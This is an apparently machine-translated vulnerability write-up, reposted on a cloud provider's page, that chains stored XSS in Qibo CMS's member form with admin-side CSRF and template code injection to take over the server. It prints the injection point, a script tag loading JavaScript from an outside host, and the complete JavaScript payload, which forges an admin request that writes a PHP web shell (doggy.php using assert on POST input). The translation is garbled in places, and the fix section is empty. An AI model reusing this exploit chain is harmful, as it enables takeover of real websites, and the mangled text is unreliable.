Qibo CMS storage type XSS getshell (Combined Use)

Source: Internet
Author: User

Qibo cms won qibo cms with the power of combining three 0day backend getshells with the front-end storage-type xss + background CSRF + with little threat and negligible impact, although it is not a serious vulnerability, the problems and breakthroughs encountered in the middle of the process are comforting. Please take a look at the official website. -- by pandas

Some time ago, when Xidu broke qibocms 0day, he saw the code of qibo cms and found several getshells in the background. There were a lot of getshells in the background, the vendor has no influence on the positive and negligible attitude. Basically, all forms submitted in the background have CSRF. If there is a front-end getshell, the power will increase a lot, so I went to the front-end black box to dig out an xss. in this way, you can use getshell. 1. storage Type XSS location: member center-> omnipotent form-> Publish information-> moderator application: The submission value of postdb [sortname] [] is not filtered, but the length is limited, but this length is enough to write <script src = "http://xxx.com/1.js">, after submission, the administrator needs to go to the background and Choose Shortcut> omnipotent form model management> moderator Application> Management> View Details. the slash is replaced, so the backslash <script src = "http: \ xxx.com \ 1.js"> is used. 1. js is the internal file that we need to load externally. Rong. here, you need to submit a form, which is located in the background system function-> plug-in management-> points Introduction Management (jfadmin_mod). Modify the points to introduce any of them, insert $ {@ phpinfo () ;}in the title or content ();}. This can cause code execution. Therefore, you can submit the code for writing a php file. 1. The js content is as follows:

thisTHost = top.location.hostname;thisTHost = "http://"+thisTHost+"/v7/admin/index.php?lfj=jfadmin&action=addjf";function PostSubmit(url) {     var postUrl = url;    var ExportForm = document.createElement("FORM");     document.body.appendChild(ExportForm);     ExportForm.method = "POST";     var newElement = document.createElement("input");     newElement.setAttribute("name", "title");     var newElement2 = document.createElement("input");     newElement2.setAttribute("name", "fid");     var newElement3 = document.createElement("input");     newElement3.setAttribute("name", "list");    var newElement4 = document.createElement("input");     newElement4.setAttribute("name", "content");     ExportForm.appendChild(newElement);     ExportForm.appendChild(newElement2);     ExportForm.appendChild(newElement3);    ExportForm.appendChild(newElement4);    newElement.value = "${@fwrite(fopen('doggy.php', 'w+'), '<?php assert($_POST[aaa]);?>')}";     newElement2.value = 1;    newElement3.value = 1;     newElement4.value = 1;     ExportForm.action = postUrl;     ExportForm.submit(); };PostSubmit(thisTHost);

 


There are two parts to prove: 1. User Part 1) login 2) Write xss 2. Administrator part view the application in the website/admin directory will add doggy. php content:
  Solution:

Repair with emphasis

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.